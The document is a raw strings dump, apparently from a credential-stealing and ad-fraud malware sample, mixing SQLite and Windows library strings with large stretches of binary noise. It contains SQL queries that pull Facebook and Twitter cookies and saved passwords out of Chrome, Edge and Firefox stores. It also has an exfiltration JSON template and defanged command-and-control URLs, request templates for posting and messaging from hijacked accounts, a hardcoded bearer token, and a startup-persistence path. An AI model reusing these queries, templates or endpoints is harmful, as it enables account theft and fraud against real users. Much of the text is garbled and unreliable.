CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));

CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);

CREATE TABLE %Q.'%q_content'(%s)

%z, 'c%d%q'

docid INTEGER PRIMARY KEY

ALTER TABLE %Q.'%q_%s' RENAME TO '%q_%s';

fts5: error creating shadow table %q_%s: %s

CREATE TABLE %Q.'%q_%q'(%s)%s

SELECT tbl,idx,stat FROM %Q.sqlite_stat1

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

unsupported file format

no such trigger: %S

no such table column: %s.%s

malformed MATCH expression: [%s]

FTS expression tree is too large (maximum depth %d)

statement aborts at %d: [%s] %s

abort at %d in [%s]: %s

%s constraint failed

%s constraint failed: %s

database table is locked: %s

cannot change %s wal mode from within a transaction

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

cannot commit transaction - SQL statements in progress

cannot release savepoint - SQL statements in progress

no such savepoint: %s

cannot open savepoint - SQL statements in progress

sqlite_sequence

there is already an index named %s

DELETE FROM %Q.%s WHERE name=%Q AND type='index'

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

no such index: %S

unable to identify the object to be reindexed

unsupported encoding: %s

NULL value in %s.%s

*** in database %s ***

no such table: %s

%s.%s.%s

'%s' is not a function

too many references to "%s": max 65535

sqlite_sq_%p

expected %d columns for '%s' but got %d

cannot create INSTEAD OF trigger on table: %S

cannot create %s trigger on view: %S

cannot open value of type %s

cannot open %s column for writing

no such column: "%s"

cannot open view: %s

cannot open table without rowid: %s

cannot open virtual table: %s

indexed

foreign key

EXECUTE %s%s SUBQUERY %d

there is already another table or index with this name: %s

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

view %s may not be altered

sqlite_altertab_%s

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

CREATE%s INDEX %.*s

expressions prohibited in PRIMARY KEY and UNIQUE constraints

sqlite_autoindex_%s_%d

index %s already exists

there is already a table named %s

virtual tables may not be indexed

views may not be indexed

table %s may not be indexed

cannot create a TEMP index on non-TEMP table "%s"

PRAGMA %Q.page_size

SELECT 1 FROM %Q.sqlite_master WHERE tbl_name='%q_stat'

%s_segments

SELECT stat FROM %Q.sqlite_stat1 WHERE tbl = '%q_rowid'

CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))

invalid fts5 file format (found %d, expected %d) - run 'rebuild'

wrong number of arguments to function %s

segid, term, pgno, PRIMARY KEY(segid, term)

id INTEGER PRIMARY KEY, block BLOB

%s_data

SELECT segid, term, (pgno>>1), (pgno&1) FROM %Q.'%q_idx' WHERE segid=%d

SELECT rowid, rank FROM %Q.%Q ORDER BY %s(%s%s%s) %s

no such function: %s

SELECT %s

SELECT count(*) FROM %Q.'%q_%s'

no such fts5 table: %s.%s

SELECT pw=sqlite_crypt(?1,pw), isAdmin FROM "%w".sqlite_user WHERE uname=?2

INSERT INTO sqlite_user(uname,isAdmin,pw) VALUES(%Q,%d,sqlite_crypt(?1,NULL))

CREATE TABLE sqlite_user(

uname TEXT PRIMARY KEY,

UPDATE sqlite_user SET isAdmin=%d, pw=sqlite_crypt(?1,NULL) WHERE uname=%Q

DELETE FROM sqlite_user WHERE uname=%Q

unable to open database: %s

Invalid key value

database %s is already in use

too many attached databases - max %d

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

table "%s" has more than one primary key

CREATE TABLE %Q.sqlite_sequence(name,seq)

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

CREATE %s %.*s

PRIMARY KEY missing on table %s

%d %d %d %d

k PRIMARY KEY, v

id INTEGER PRIMARY KEY, sz BLOB

, c%d

id INTEGER PRIMARY KEY

misuse of aggregate: %s()

SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s

SELECT %s ORDER BY rowid %s

%s: table does not support scanning

cannot %s contentless fts5 table: %s

%d values for %d columns

table %S has %d columns but %d values were supplied

table %S has no column named %s

-- TRIGGER %s

use DROP VIEW to delete view %s

use DROP TABLE to delete table %s

table %s may not be dropped

sqlite_stat

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

CREATE TABLE x(%s %Q HIDDEN, docid HIDDEN, %Q HIDDEN)

missing %s parameter in fts4 constructor

error parsing prefix parameter: %s

unrecognized order: %s

unrecognized matchinfo: %s

unrecognized parameter: %s

notindexed

%s, %s

CREATE TABLE x(%s

CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)

%z, %Q HIDDEN, %s HIDDEN)

%z%s%Q

Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

%S#[k

?#%X.y

GetProcessWindowStation

KERNEL32.dll

GetCPInfo

sqlite3.dll

sqlite3_aggregate_context

sqlite3_aggregate_count

sqlite3_auto_extension

sqlite3_backup_finish

sqlite3_backup_init

sqlite3_backup_pagecount

sqlite3_backup_remaining

sqlite3_backup_step

sqlite3_bind_blob

sqlite3_bind_blob64

sqlite3_bind_double

sqlite3_bind_int

sqlite3_bind_int64

sqlite3_bind_null

sqlite3_bind_parameter_count

sqlite3_bind_parameter_index

sqlite3_bind_parameter_name

sqlite3_bind_text

sqlite3_bind_text16

sqlite3_bind_text64

sqlite3_bind_value

sqlite3_bind_zeroblob

sqlite3_bind_zeroblob64

sqlite3_blob_bytes

sqlite3_blob_close

sqlite3_blob_open

sqlite3_blob_read

sqlite3_blob_reopen

sqlite3_blob_write

sqlite3_busy_handler

sqlite3_busy_timeout

sqlite3_cancel_auto_extension

sqlite3_changes

sqlite3_clear_bindings

sqlite3_close

sqlite3_close_v2

sqlite3_collation_needed

sqlite3_collation_needed16

sqlite3_column_blob

sqlite3_column_bytes

sqlite3_column_bytes16

sqlite3_column_count

sqlite3_column_database_name

sqlite3_column_database_name16

sqlite3_column_decltype

sqlite3_column_decltype16

sqlite3_column_double

sqlite3_column_int

sqlite3_column_int64

sqlite3_column_name

sqlite3_column_name16

sqlite3_column_origin_name

sqlite3_column_origin_name16

sqlite3_column_table_name

sqlite3_column_table_name16

sqlite3_column_text

sqlite3_column_text16

sqlite3_column_type

sqlite3_column_value

sqlite3_commit_hook

sqlite3_compileoption_get

sqlite3_compileoption_used

sqlite3_complete

sqlite3_complete16

sqlite3_config

sqlite3_context_db_handle

sqlite3_create_collation

sqlite3_create_collation16

sqlite3_create_collation_v2

sqlite3_create_function

sqlite3_create_function16

sqlite3_create_function_v2

sqlite3_create_module

sqlite3_create_module_v2

sqlite3_data_count

sqlite3_db_config

sqlite3_db_filename

sqlite3_db_handle

sqlite3_db_mutex

sqlite3_db_readonly

sqlite3_db_release_memory

sqlite3_db_status

sqlite3_declare_vtab

sqlite3_enable_load_extension

sqlite3_enable_shared_cache

sqlite3_errcode

sqlite3_errmsg

sqlite3_errmsg16

sqlite3_errstr

sqlite3_exec

sqlite3_expired

sqlite3_extended_errcode

sqlite3_extended_result_codes

sqlite3_file_control

sqlite3_finalize

sqlite3_free

sqlite3_free_table

sqlite3_get_autocommit

sqlite3_get_auxdata

sqlite3_get_table

sqlite3_global_recover

sqlite3_initialize

sqlite3_interrupt

sqlite3_key

sqlite3_key_v2

sqlite3_last_insert_rowid

sqlite3_libversion

sqlite3_libversion_number

sqlite3_limit

sqlite3_load_extension

sqlite3_log

sqlite3_malloc

sqlite3_malloc64

sqlite3_memory_alarm

sqlite3_memory_highwater

sqlite3_memory_used

sqlite3_mprintf

sqlite3_msize

sqlite3_mutex_alloc

sqlite3_mutex_enter

sqlite3_mutex_free

sqlite3_mutex_leave

sqlite3_mutex_try

sqlite3_next_stmt

sqlite3_open

sqlite3_open16

sqlite3_open_v2

sqlite3_os_end

sqlite3_os_init

sqlite3_overload_function

sqlite3_prepare

sqlite3_prepare16

sqlite3_prepare16_v2

sqlite3_prepare_v2

sqlite3_profile

sqlite3_progress_handler

sqlite3_randomness

sqlite3_realloc

sqlite3_realloc64

sqlite3_rekey

sqlite3_rekey_v2

sqlite3_release_memory

sqlite3_reset

sqlite3_reset_auto_extension

sqlite3_result_blob

sqlite3_result_blob64

sqlite3_result_double

sqlite3_result_error

sqlite3_result_error16

sqlite3_result_error_code

sqlite3_result_error_nomem

sqlite3_result_error_toobig

sqlite3_result_int

sqlite3_result_int64

sqlite3_result_null

sqlite3_result_subtype

sqlite3_result_text

sqlite3_result_text16

sqlite3_result_text16be

sqlite3_result_text16le

sqlite3_result_text64

sqlite3_result_value

sqlite3_result_zeroblob

sqlite3_result_zeroblob64

sqlite3_rollback_hook

sqlite3_rtree_geometry_callback

sqlite3_rtree_query_callback

sqlite3_set_authorizer

sqlite3_set_auxdata

sqlite3_shutdown

sqlite3_sleep

sqlite3_snprintf

sqlite3_soft_heap_limit

sqlite3_soft_heap_limit64

sqlite3_sourceid

sqlite3_sql

sqlite3_status

sqlite3_status64

sqlite3_step

sqlite3_stmt_busy

sqlite3_stmt_readonly

sqlite3_stmt_status

sqlite3_strglob

sqlite3_stricmp

sqlite3_strnicmp

sqlite3_table_column_metadata

sqlite3_test_control

sqlite3_thread_cleanup

sqlite3_threadsafe

sqlite3_total_changes

sqlite3_trace

sqlite3_transfer_bindings

sqlite3_update_hook

sqlite3_uri_boolean

sqlite3_uri_int64

sqlite3_uri_parameter

sqlite3_user_add

sqlite3_user_authenticate

sqlite3_user_change

sqlite3_user_data

sqlite3_user_delete

sqlite3_value_blob

sqlite3_value_bytes

sqlite3_value_bytes16

sqlite3_value_double

sqlite3_value_dup

sqlite3_value_free

sqlite3_value_int

sqlite3_value_int64

sqlite3_value_numeric_type

sqlite3_value_subtype

sqlite3_value_text

sqlite3_value_text16

sqlite3_value_text16be

sqlite3_value_text16le

sqlite3_value_type

sqlite3_vfs_find

sqlite3_vfs_register

sqlite3_vfs_unregister

sqlite3_vmprintf

sqlite3_vsnprintf

sqlite3_vtab_config

sqlite3_vtab_on_conflict

sqlite3_wal_autocheckpoint

sqlite3_wal_checkpoint

sqlite3_wal_checkpoint_v2

sqlite3_wal_hook

sqlite3_win32_is_nt

sqlite3_win32_mbcs_to_utf8

sqlite3_win32_set_directory

sqlite3_win32_sleep

sqlite3_win32_utf8_to_mbcs

sqlite3_win32_write_debug

zcÁ

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

2,292}: ;

7074787<7

)0:0&171

? ?$?(?,?

2 2.272^2

6(7,7074709

< <$<(<,<0<4<8<

8Œ8-:2:o:t:

6(7,70747|7

0 0$0(0,0004080

\\.\PhysicalDrive0000000-000000-000000-000000-000000

@Windows 10

Windows Server Technical Preview

Windows Vista

Windows Server 2008

Windows 7

Windows Server 2008 R2

Windows 8

Windows Server 2012

Windows 8.1

Windows Server 2012 R2

Windows 2000

Windows XP

Windows Server 2003 R2

Windows Storage Server 2003

Windows Home Server

Windows XP Professional x64 Edition

Windows Server 2003

Windows 98

Web Server Edition

{"code":"{Code}","type":{type},"ver":"{Ver}","browser":"{Browser}","user":"{User}","pass":"{Pass}","cookies":"{Cookies}","aid":{Aid},"utype":{uType}}

{Pass}

hXXp://api.faceboolad.com/api//send

WinHttp.WinHttpRequest.5.1

hXXp://VVV.facebook.com

Server-Key

Chrome

Firefox

facebook.com

select name,encrypted_value from cookies where host_key = '.facebook.com'

\Local\Google\Chrome\User Data

\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies

\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies

\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies

hXXps://VVV.facebook.com/

select name,value from moz_cookies where host = '.facebook.com'

\Roaming\Mozilla\Firefox\Profiles

\cookies.sqlite

Login Data

select username_value, password_value, signon_realm from logins

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36

hXXp://api.faceboolad.com/api//GetTask?code=

[ImageUrl]

Dalvik/2.1.0 (Linux; U; Android 6.0.1; MI NOTE LTE MIUI/6.8.11)

twitter.com

772630264522559488

select name,encrypted_value from cookies where host_key = '.twitter.com'

hXXps://VVV.twitter.com/

select name,value from moz_cookies where host = '.twitter.com'

Bearer AAAAAAAAAAAAAAAAAAAAANRILgAAAAAAnNwIzUejRCOuH5E6I8xnZz4puTs=1Zv7ttfk8LF81IUq16cHjhLTvJu4FA33AGWWjCpTnA

hXXps://m.facebook.com/

hXXps://VVV.facebook.com/settings

VBScript.RegExp

hXXps://m.facebook.com/composer/mbasic/?av={c_user}&refid=8

fb_dtsg={fb_dtsg}&charset_test=â‚¬,Â´,â‚¬,Â´,æ°´,Ð”,Ð„&privacyx={privacyx}&target={c_user}&c_src=feed&cwevent=composer_entry&referrer=feed&ctype=inline&cver=amber&rst_icv=&xc_message=&view_privacy=

hXXps://m.facebook.com/home.php

hXXps://m.facebook.com

hXXps://VVV.facebook.com/notes/composer/photos/?thumb_height=116&thumb_width=149&av={c_user}&dpr=1

hXXps://m.facebook.com/composer/mbasic/?av={c_user}&refid=7&ref=wizard

fb_dtsg={fb_dtsg}&charset_test=â‚¬,Â´,â‚¬,Â´,æ°´,Ð”,Ð„&privacyx={privacyx}&target={c_user}&c_src=feed&cwevent=composer_entry&referrer=feed&ctype=inline&cver=amber&rst_icv=&xc_message={text}&view_post=å‘å¸ƒ

hXXps://m.facebook.com/home.php?ref=wizard&_rdr

hXXps://m.facebook.com/composer/mbasic/?csid=94c178a8-8774-424a-8c53-9994984e3fba&incparms[0]=xc_message&av={c_user}

------WebKitFormBoundarydDyitWHTKuC21cBZ

â‚¬,Â´,â‚¬,Â´,æ°´,Ð”,Ð„

94c178a8-8774-424a-8c53-9994984e3fba

web_m_touch

å‘å¸ƒ

Content-Disposition: form-data; name="file0"; filename="test.jpg"

------WebKitFormBoundarydDyitWHTKuC21cBZ--

hXXps://m.facebook.com/composer/mbasic/?mnt_query&csid=94c178a8-8774-424a-8c53-9994984e3fba

multipart/form-data; boundary=----WebKitFormBoundarydDyitWHTKuC21cBZ

hXXps://m.facebook.com/home.php?stype=phs&sk=live&gfid=

hXXps://VVV.facebook.com/notes/composer/?dpr=1

hXXps://VVV.facebook.com

hXXps://VVV.facebook.com/notes

hXXps://VVV.facebook.com/notes/composer/upload/coverphoto/?media_type=photo¬e_id={NoteId}&__a=1&fb_dtsg={fb_dtsg}

------WebKitFormBoundaryy1orVA8O3OLUfzBE

Content-Disposition: form-data; name="file"; filename="test.jpg"

------WebKitFormBoundaryy1orVA8O3OLUfzBE--

multipart/form-data; boundary=----WebKitFormBoundaryy1orVA8O3OLUfzBE

hXXps://VVV.facebook.com/notes/composer/publish/?av={c_user}&dpr=1

{"offset":{offset},"length":{length},"key":{Index}}

{URL}

"{Index}":{"id":null,"type":7,"data":{"url":"{URL}"}}

hXXps://m.facebook.com/friends/center/friends/?ppk={page}

hXXps://m.facebook.com/friends/center/friends/?mff_nav=1&fb_ref=fbm&ref=bookmarks

XMLHttpRequest

hXXps://VVV.facebook.com/messaging/send/?dpr=1

client=mercury&action_type=ma-type:user-generated-message&body={text}&has_attachment=false&message_id={messageId}&offline_threading_id={messageId}&other_user_fbid={fbid}&source=source:chat:web&specific_to_list[0]=fbid:{fbid}&specific_to_list[1]=fbid:{c_user}×tamp={time}&ui_push_phase=V3&__a=1&fb_dtsg={fb_dtsg}

Math.round(new Date().getTime()/1000)

Math.round(new Date().getTime())

Math.round(new Date().getTime() * 100)

function genOfflineThreadingID(){return new Date().getTime()   Math.random().toString().slice(2,8);}

select count(*) from sqlite_master where type='table' and tbl_name='

select tbl_name from sqlite_master where type='table' and tbl_name<>'sqlite_sequence'

hXXps://mobile.twitter.com/account

hXXps://mobile.twitter.com/settings

hXXps://api.twitter.com/1.1/users/lookup.json?include_blocking=true&include_blocked_by=true&include_can_dm=true&include_followed_by=true&include_mute_edge=true&screen_name=

hXXps://api.twitter.com/1.1/friendships/create.json

hXXps://api.twitter.com/1.1/statuses/update.json

&media_type=image/jpeg

hXXps://upload.twitter.com/i/media/upload.json?command=INIT&total_bytes=

hXXps://mobile.twitter.com/compose/tweet

hXXps://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=

------WebKitFormBoundaryUbnK77J90KHiGB65

------WebKitFormBoundaryUbnK77J90KHiGB65--

hXXps://mobile.twitter.com

multipart/form-data; boundary=----WebKitFormBoundaryUbnK77J90KHiGB65

hXXps://upload.twitter.com/i/media/upload.json?command=FINALIZE&media_id=

hXXps://api.twitter.com/1.1/followers/list.json?cursor=

hXXps://api.twitter.com/1.1/friends/list.json?cursor=

hXXps://api.twitter.com/1.1/users/recommendations.json?include_blocking=true&include_blocked_by=true&include_can_dm=true&include_followed_by=true&include_mute_edge=true&skip_status=true&limit=300&pc=true&display_location=WTF_viewall&user_id=

hXXps://twitter.com/trends/location_dialog

hXXps://twitter.com/

trends_cache_key

hXXps://twitter.com/i/trends?k={key}&pc=true&personalized=false&show_context=true&src=module&woeid={woeid}

{key}

hXXps://twitter.com/i/search/timeline?vertical=default&q=#{key}&src=tren&composed_count=0&include_available_features=1&include_entities=1&include_new_items_bar=true&interval={interval}&latent_count=0&min_position={min_position}

application/x-www-form-urlencoded

SetClientCertificate

TempObj=JSON.parse(str);

var obj=JSON.parse(str);

Lobj.push(obj);

return Lobj.length;

function GetAllKey(){

Lobj = JSON.parse(str);

var str=JSON.stringify(Lobj);

return Lobj.str;

if (typeof Date.prototype.toJSON !== 'function') {

Date.prototype.toJSON = function (key) {

return isFinite(this.valueOf())

? this.getUTCFullYear()   '-'

f(this.getUTCMonth()   1)   '-'

f(this.getUTCDate())   'T'

f(this.getUTCHours())   ':'

f(this.getUTCMinutes())   ':'

f(this.getUTCSeconds())   'Z'

String.prototype.toJSON =

Number.prototype.toJSON =

Boolean.prototype.toJSON = function (key) {

return this.valueOf();

'"' : '\\"',

'\\': '\\\\'

escapable.lastIndex = 0;

return escapable.test(string) ? '"'   string.replace(escapable, function (a) {

: '\\u'   ('0000'   a.charCodeAt(0).toString(16)).slice(-4);

function str(key, holder) {

k, // The member key.

value = holder[key];

typeof value.toJSON === 'function') {

value = value.toJSON(key);

value = rep.call(holder, key, value);

if (Object.prototype.toString.apply(value) === '[object Array]') {

length = value.length;

v = partial.length === 0

? '[\n'   gap   partial.join(',\n'   gap)   '\n'   mind   ']'

: '['   partial.join(',')   ']';

length = rep.length;

partial.push(quote(k)   (gap ? ': ' : ':')   v);

if (Object.prototype.hasOwnProperty.call(value, k)) {

v = partial.length === 0

? '{\n'   gap   partial.join(',\n'   gap)   '\n'   mind   '}'

: '{'   partial.join(',')   '}';

if (typeof JSON.stringify !== 'function') {

JSON.stringify = function (value, replacer, space) {

typeof replacer.length !== 'number')) {

throw new Error('JSON.stringify');

if (typeof JSON.parse !== 'function') {

JSON.parse = function (text, reviver) {

function walk(holder, key) {

var k, v, value = holder[key];

if (Object.prototype.hasOwnProperty.call(value, k)) {

return reviver.call(holder, key, value);

cx.lastIndex = 0;

if (cx.test(text)) {

text = text.replace(cx, function (a) {

('0000'   a.charCodeAt(0).toString(16)).slice(-4);

.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')

.replace(/"[^"\\\n\r]*"|true|false|null|-?\d (?:\.\d*)?(?:[eE][ \-]?\d )?/g, ']')

.replace(/(?:^|:|,)(?:\s*\[) /g, ''))) {

throw new SyntaxError('JSON.parse');

JSON.stringify(Lobj['

Lobj.push("

Lobj.push(

Lobj.push('

Lobj.length

JSON.stringify(Lobj[

Lobj.splice(

JSON.stringify(Lobj

GetAllKey

var keyStr = "ABCDEFGHIJKLMNOP"

for (var i=0; i<strNative.length; i  ) {

var c = strNative.charAt(i);

var cc = strNative.charCodeAt(i);

return hexChars.charAt(nH)   hexChars.charAt(nL);

var posTo = strAscii.indexOf("\\u", posFrom);

output  = strAscii.substring(posFrom, posTo);

output  = toChar(strAscii.substr(posTo, 6));

posTo = strAscii.indexOf("\\u", posFrom);

output  = strAscii.substr(posFrom);

if (str.substr(0, 2) != "\\u") return str;

for (var i=2; i<str.length; i  ) {

var cc = str.charCodeAt(i);

return String.fromCharCode(code);

function URlEncode(temp){return(encodeURIComponent(temp));}

function URlDecode(temp){return(decodeURIComponent(temp));}

function Utf8Decode(temp){return(URlDecode(decodeURI(temp)));}

URlDecode

URlEncode

Adodb.Stream

kernel32.dll

advapi32.dll

ntdll.dll

Kernel32.dll

ole32.dll

shlwapi.dll

shell32.dll

crypt32.dll

wininet.dll

psapi.dll

MsgWaitForMultipleObjects

program internal error number is %d.

:"%s"

:"%s".

C:\Users\"%CurrentUserName%"\AppData\Roamin\Mstui\dllhost.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

USER32.DLL

operator

TcPX

G%FuSVb

l".mN{

.as2h

.HptE

&.JVlh

w.UqB$p

%cW4I

).BF`

@~x.iu

5Q5%f

#üs#

]7.rg

mpr

"4St%c

B%XP_C(

.rWV/b~

^%UY/

?%F.{<

#m|%dMI3

.iF(`uO2

c.SFk&[

.hC(apO3

u.OVk:K

u.HVk:K

/%xVt

)fW.mdG

%fQ#obD?

.bNL"

.bML"

X.kzf5i

Tm.nK

%XPVS

}^,%d

#@1.EY

.WD:T

mn%XT

_(Web

f.zB"

.cRJ2b

PD.eX

|)xAh.YwL67j

%SoHC

-X}*j;5j

%SPzK$$

sC.Cq)

(.JY_}

R%XN9

!%CYT

h0%x~_

(.Us#

P'-4u}

Nk.MV

%CwB5ZU

hN.bT{

D$,2%f

.EDRk(

0 0<0@0`0

USER32.dll

.pq!q[

n.HoN

c!%Cs

Dg4x'A%C

.Ye&`

XcRT@

~*=]^.Zn

.njDC

v.Wof

.vx?ryV

'].PoC

Crtm

i;O}t%U

1y.cvr

.Zq/A

%SqtY

)]%s,#

%x9?l

.XubOk

'(.XD

.gavy

vf[%FT

%SyI]

9.lY&

6nl*%u

nKt.Sm

q%FOu

.jn^'@4<

ly}@

/OgX%d~

%U7B&R

\%X?Y

h`'.qih

m}o%D

*.pB?

.meD'1

mLu h%C

!O&A%C

q1%su

({.kc

95;*?=?1

y.yaa

.jtE".

/msG<

%F.rH

.bfY7m

.wBfi

112 34"7?

B.Jex

Ye.FU

)K%X:^

!OPsWININET.dll

{sole32.dll

CRYPT32.dll

OLEAUT32.dll

=#TCT?

^d.JL[

W.cFZ?

<vSHELL32.dll

PSAPI.DLL

;=: ;"${/

PKERNEL32.dll

SHLWAPI.dll

*.WN6T

-@ .wj

.ZWOI

%f[o4

þiq

.cg6Y

Co.vT

?wn.vh

?m.re

nG5%S

Z2.ywq

a:-}%X

.Rwuf

.wX(%

.nWUFwNOI

.vXFD

*&.tT

%xHiG

A m*%c

.vwfb

w.QOt

%X$4m

h.QYV

eudPk

%1sG7

o8&`.wF

%XQMw

H.wFu

.tx#-

d.cEw

T.hjw

.vbYq_\t}@ym:

s.cGm

.kh;w

Cgw`8%f

*.Vr;

'm%6s6

4?v.Kv

w%d(*f

.Ri0;w`

m.LwO:

.aDWC

w\Hwu%UwN

!.yww4

.Jw<S

%smGwe'@

e!hfJ-D}

0avÜ

.sw#I

-b}(%

|w.Ec

x.LA,wz9n&|

?zw.Cc

weBg

w#.rS

.ws|v

5wþ

.wHwn2

~Bj.WI

_x@.ep

%D{w@X

",w.Vx

%Dw7W

B(.VO

.BsRk

m!S

FLu%5xNM

@.EVQ(j

?ji%D

.wgh< !

#Ow%c!v

B.wR2S

e_)%D#Gmw

m[.OC

zg%XSi

(.Ev}

i.ZDL

v1hB.KAW}

a.TfZ!

O.Hw?

,.YwM

t7.hJ

wDpZ%x

.kiH"

?$.Bwp(

.dmvE

B.QJR

0<{:.wDN

t.HCm

B.xmw

oWEB^w\

.Sw6G

$s%Fj

4F,%f~

.rDF_

%DX"w

.wI(O

w.wV'

.mwa!x

G(%d{

xv.%do

^fË2U

%D{@X

F.ju-as

-.Tg?

cf.wd

%c^RX

L.jq1t

.Kw]D

%FhtQ

YZ.sW

F^.tlr

p\F%c

B7Y.ev

bIw.ga=<

5?474/4'

-/_"]/_-

.tInC

G%Cgs)

I.nt[

57.lC)

].BY k

-.Hx:

%s*':

FF^%uB

4.If`

nû.a

OFADVAPI32.dll

*6Âk

81Þ

nEb.cRw&Dz

$Ï'

:.MjQ

B:Í

.Mx&[

`]T-O}S{E

1%XJVt

@.euee

0%c<pf?

.ZHh^

.Pq k

m.pz_

V5.rN

92>>4:::444

4$1$%dh`Vp/8

%D_RE

]].eX6t0

co.KKV-C^

.cEvO:8

^D.DA}

&.bEy"

zU.CC

 k5%D

-'''%'%'%'%'%'%'%'%'%'%'%'%'%'%'%'%'%'',

^^`^`^`^

^`^`^```

&##&&&&###(&@

88878878878878'

36333-

553533533'

%'**  -'

'00  ***'%

%'** -0'

33000  ***%

%'   -0

-363300   *'%

%' --00'

35336363300--  %

0' 0333033030330330 '0

 *'' ''*'*'*'*'-

%#(**-...--/-/-0---/--***''

"**---..././-0-0-0----***"

''**-*--**-*--*-*%"*

<meta http-equiv="Content-Language" content="zh-cn">

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

//szVersion = window.external.GetRealVersion();

alert(window.external.GetPingbackBasicString());

mscoree.dll

KERNEL32.DLL

WUSER32.DLL

SQLite

SQLite3 Database Library

3.9.2.1

SQLite3

Error at initialization of bundled DLL: %s

Error at hooking API "%S"

Dumping first %d bytes:

10.0.1 build-1379776

vmware.exe

2.2.1.7

QiyiClient.exe

dllhost.exe_2044_rwx_00548000_00108000:

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

GetProcessWindowStation

USER32.DLL

operator

C:\Users\"%CurrentUserName%"\AppData\Roamin\Mstui\dllhost.exe

TcPX

G%FuSVb

l".mN{

.as2h

.HptE

&.JVlh

w.UqB$p

%cW4I

).BF`

@~x.iu

5Q5%f

#üs#

]7.rg

mpr

"4St%c

B%XP_C(

.rWV/b~

^%UY/

?%F.{<

#m|%dMI3

.iF(`uO2

c.SFk&[

.hC(apO3

u.OVk:K

u.HVk:K

/%xVt

)fW.mdG

%fQ#obD?

.bNL"

.bML"

X.kzf5i

Tm.nK

%XPVS

}^,%d

#@1.EY

.WD:T

mn%XT

_(Web

f.zB"

.cRJ2b

PD.eX

|)xAh.YwL67j

%SoHC

-X}*j;5j

%SPzK$$

sC.Cq)

(.JY_}

R%XN9

!%CYT

h0%x~_

(.Us#

P'-4u}

Nk.MV

%CwB5ZU

hN.bT{

D$,2%f

.EDRk(

0 0<0@0`0

KERNEL32.DLL

mscoree.dll

Error at initialization of bundled DLL: %s

Error at hooking API "%S"

Dumping first %d bytes:

dllhost.exe_2044_rwx_006E1000_00001000:

^d.JL[

svchost.exe_2944:

.text

`.rdata

@.data

.vmp0

.vmp1

.rsrc

f9z.vk

hXXp://bus.ad-jump.com

hXXp://imcrack.ad-jump.com

Software\Microsoft\Windows\CurrentVersion\Uninstall\MyTransitGuideTooltab Uninstall Internet Explorer

Click On Web Ads : {0} !

\chrome.exe

SOFTWARE\SetupCompanyWindows 10

Windows Server Technical Preview

Windows Vista

Windows Server 2008

Windows 7

Windows Server 2008 R2

Windows 8

Windows Server 2012

Windows 8.1

Windows Server 2012 R2

Windows 2000

Windows XP

Windows Server 2003 R2

Windows Storage Server 2003

Windows Home Server

Windows XP Professional x64 Edition

Windows Server 2003

Windows 98

Web Server Edition

\Internet Explorer\iexplore.exe

Scripting.FileSystemObject

AlwaysShowMenus

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

DisplayVersionSOFTWARE\Mozilla\Mozilla Firefox\

SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\

PathToExe

Software\\Microsoft\\Windows\\CurrentVersion\\Run

hXXp://my.pcmaps.net/api/report?type={type}&code={code}

WinHttp.WinHttpRequest.5.1

hXXp://rep.pe-wok.biz/track_ch.php?ip={IP}&o=2

hXXp://my.pcmaps.net/api/ip

iexplore.exe

document.getElementById('HPChkbxImg').click();

document.getElementById('download_main_btn1').click();

IExplore Url : {0} !

&7{00020400-0000-0000-C000-000000000046}

Sleep : FindIExploreSetupWindowsHandle......

FindIExploreSetupWindowsHandle TimeOut !

hXXp://my.pcmaps.net/list.txt

user32.dll

shlwapi.dll

kernel32.dll

advapi32.dll

ntdll.dll

